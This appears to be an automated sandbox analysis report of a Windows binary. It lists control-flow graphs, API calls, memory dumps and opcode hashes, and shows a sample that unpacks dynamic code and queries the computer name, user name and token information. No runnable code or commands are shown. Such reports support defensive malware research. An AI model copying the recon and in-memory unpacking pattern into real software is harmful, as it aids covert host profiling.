                                                                                                                                                                                                                          control_flow_graph 630 4017e0-4017e7 631 4017f3-4017f9 630->631 632 4017e9-4017ee EntryPoint 630->632 633 401805-40180c 631->633 634 4017fb-401800 EntryPoint 631->634 632->631 635 401818-40181c 633->635 636 40180e-401813 EntryPoint 633->636 634->633 637 401858-40185c 635->637 638 40181e-401822 635->638 636->635 639 401847 637->639 640 40185e-401866 call 40b743 637->640 641 401824-401832 call 40b783 638->641 642 40183e-401844 call 40b6b5 638->642 644 401849-40184c 639->644 652 401869-40186b 640->652 641->652 653 401834-401839 EntryPoint 641->653 642->639 648 40186d-40186f 644->648 649 40184e-401853 EntryPoint 644->649 649->637 652->644 653->642
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EntryPoint.YMAFVVDS(80070057), ref: 004017EE
                                                                                                                                                                                                                            • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                                                                                                                                                            • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                                                                                                                          • EntryPoint.YMAFVVDS(80070057), ref: 00401800
                                                                                                                                                                                                                          • EntryPoint.YMAFVVDS(80070057), ref: 00401813
                                                                                                                                                                                                                          • __recalloc.LIBCMT ref: 00401828
                                                                                                                                                                                                                          • EntryPoint.YMAFVVDS(8007000E), ref: 00401839
                                                                                                                                                                                                                          • EntryPoint.YMAFVVDS(8007000E), ref: 00401853
                                                                                                                                                                                                                          • _calloc.LIBCMT ref: 00401861
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1721462702-0
                                                                                                                                                                                                                          • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                                                                                                          • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                                                                                                                          Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 670 414738-414753 call 40e1d8 call 410735 675 414755-414759 670->675 676 414777-4147a0 call 40d6e0 call 4146fa call 4147a2 670->676 675->676 678 41475b-414760 call 410735 675->678 684 414763-414765 676->684 678->684 686 414767-41476e call 40e79a 684->686 687 41476f-414776 call 40e21d 684->687 686->687
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                          • String ID: @.B
                                                                                                                                                                                                                          • API String ID: 3521780317-470711618
                                                                                                                                                                                                                          • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                          • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                                          Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2805327698-0
                                                                                                                                                                                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                          • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                                          Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(00422910), ref: 00414050
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                                                          • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                          • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                                          Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                                                                                                                                          • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                          • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                                          Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3322701435-0
                                                                                                                                                                                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                          • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                                                          Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                                                          • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2395185920-0
                                                                                                                                                                                                                          • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                                          • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                                                          Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _fseek_malloc_memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 208892515-0
                                                                                                                                                                                                                          • Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                                                                                                                                                          • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                                                          Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                                                          • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                                                          • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3240763771-0
                                                                                                                                                                                                                          • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                          • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                                          Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                                                          • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                          • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                                          Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                          • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:4.1%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:97.6%
                                                                                                                                                                                                                          Signature Coverage:9.6%
                                                                                                                                                                                                                          Total number of Nodes:83
                                                                                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                                                                                          execution_graph 5880 4a5b09 5881 4a5b16 5880->5881 5882 4a5cdf CreateThread 5881->5882 5883 4a5c01 5881->5883 5882->5883 5884 4a54a0 VirtualAlloc 5882->5884 5891 4a55ef 5893 4a55ac 5891->5893 5894 4a55e9 5893->5894 5895 4c3870 5893->5895 5896 4c3876 5895->5896 5898 4c3893 5896->5898 5899 4c3720 5896->5899 5898->5893 5901 4b0c42 5899->5901 5900 4c37dd 5900->5898 5901->5899 5901->5900 5902 4ae050 VirtualAlloc 5901->5902 5902->5901 5791 4a5b42 5792 4a5b07 5791->5792 5792->5791 5793 4a5b68 5792->5793 5794 4a5cdf CreateThread 5792->5794 5794->5793 5795 4a54a0 5794->5795 5796 4a54b5 5795->5796 5797 4a5522 VirtualAlloc 5796->5797 5797->5796 5798 4a5b00 5799 4a5bba 5798->5799 5806 4b52c0 5799->5806 5801 4a5bc7 5805 4a5bde 5801->5805 5811 4c0080 5801->5811 5807 4b52c6 5806->5807 5810 4b52ce 5806->5810 5807->5810 5825 4ae050 5807->5825 5810->5801 5816 4c0089 5811->5816 5812 4c03e0 GetComputerNameW 5812->5816 5813 4c0181 VirtualFree 5813->5816 5814 4ae050 VirtualAlloc 5814->5816 5815 4c03bf GetUserNameW 5815->5816 5816->5812 5816->5813 5816->5814 5816->5815 5817 4c04d6 GetComputerNameW 5816->5817 5818 4a5c7b 5816->5818 5817->5816 5819 4a8070 5818->5819 5823 4a8075 5819->5823 5820 4a8186 CloseHandle 5820->5823 5821 4a80ca GetTokenInformation 5821->5823 5822 4a81ad GetTokenInformation 5822->5823 5823->5820 5823->5821 5823->5822 5824 4a80a7 5823->5824 5824->5805 5826 4ae0c3 5825->5826 5827 4ae0d8 VirtualAlloc 5826->5827 5827->5826 5841 4a5860 5842 4b52c0 VirtualAlloc 5841->5842 5843 4a5869 5842->5843 5844 4c0080 5 API calls 5843->5844 5845 4a587d 5844->5845 5846 4a8070 3 API calls 5845->5846 5847 4a5870 5846->5847 5834 4a5b87 CreateThread 5835 4a5b1c 5834->5835 5839 4a5810 5834->5839 5836 4a5cdf CreateThread 5835->5836 5837 4a5c01 5835->5837 5836->5837 5838 4a54a0 VirtualAlloc 5836->5838 5840 4a5822 5839->5840 5848 4a54c4 5850 4a54c5 5848->5850 5849 4a5522 VirtualAlloc 5849->5850 5850->5849 5903 4a55e4 5905 4a55ac 5903->5905 5904 4c3870 VirtualAlloc 5904->5905 5905->5903 5905->5904 5906 4a55e9 5905->5906 5851 4a8090 5855 4a8075 5851->5855 5852 4a8186 CloseHandle 5852->5855 5853 4a80ca GetTokenInformation 5853->5855 5854 4a81ad GetTokenInformation 5854->5855 5855->5852 5855->5853 5855->5854 5856 4a80a7 5855->5856 5907 4a57f0 5908 4a55ac 5907->5908 5909 4a55e9 5908->5909 5910 4c3870 VirtualAlloc 5908->5910 5910->5908 5828 4a81b1 5832 4a8075 5828->5832 5829 4a8186 CloseHandle 5829->5832 5830 4a80ca GetTokenInformation 5830->5832 5831 4a81ad GetTokenInformation 5831->5832 5832->5829 5832->5830 5832->5831 5833 4a80a7 5832->5833

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 004C0080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 4c0080-4c0286 2 4c028c 0->2 3 4c0099-4c0575 0->3 5 4c0445 2->5 6 4c057b 3->6 7 4c0155 3->7 5->3 8 4c044b-4c0457 5->8 6->7 9 4c0581-4c0587 6->9 10 4c02ef-4c0495 call 4ae050 * 2 7->10 11 4c0458-4c0472 GetComputerNameW 8->11 13 4c058b 9->13 10->11 55 4c043e 10->55 18 4c024c-4c0253 11->18 19 4c03ee-4c03f4 11->19 16 4c058c-4c0591 13->16 17 4c0181 VirtualFree 13->17 20 4c04ab-4c04af 16->20 21 4c0597 16->21 25 4c01a8-4c02ac call 4d7164 17->25 22 4c0255 18->22 23 4c01e6 18->23 34 4c00da-4c023f 19->34 35 4c03fa 19->35 46 4c04c7 20->46 21->20 27 4c059d 21->27 28 4c02d3 22->28 31 4c01ec-4c0313 call 4d715c 23->31 32 4c02b1-4c02be 23->32 25->32 27->20 28->23 33 4c02d9 28->33 52 4c0318-4c031e 31->52 40 4c03bf-4c03d9 GetUserNameW 32->40 41 4c02c4 32->41 33->10 34->18 50 4c0241-4c024a 34->50 35->34 43 4c0400 35->43 48 4c0331 40->48 41->40 49 4c02ca 41->49 51 4cb1ee-4cb49f 43->51 58 4c04cc-4c04e6 call 4d9970 GetComputerNameW 46->58 53 4c0337 48->53 54 4c0171 48->54 49->28 50->18 50->32 56 4c0568-4c056b 52->56 57 4c0324 52->57 53->54 61 4c033d 53->61 59 4c013f-4c0146 54->59 60 4c0173 54->60 55->5 56->58 57->56 63 4c032a 57->63 70 4c04ec-4c0514 58->70 71 4c0131 58->71 59->13 65 4c0230 60->65 66 4c05d0-4c05d9 61->66 63->48 65->46 67 4c0236-4c05c2 65->67 66->51 67->46 74 4c05c8-4c05c9 67->74 70->56 72 4c0089-4c008c 71->72 73 4c0137 71->73 72->25 75 4c0092 72->75 73->72 76 4c013d 73->76 74->66 75->25 78 4c0098 75->78 76->17 76->59 78->3
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ComputerName
                                                                                                                                                                                                                          • String ID:
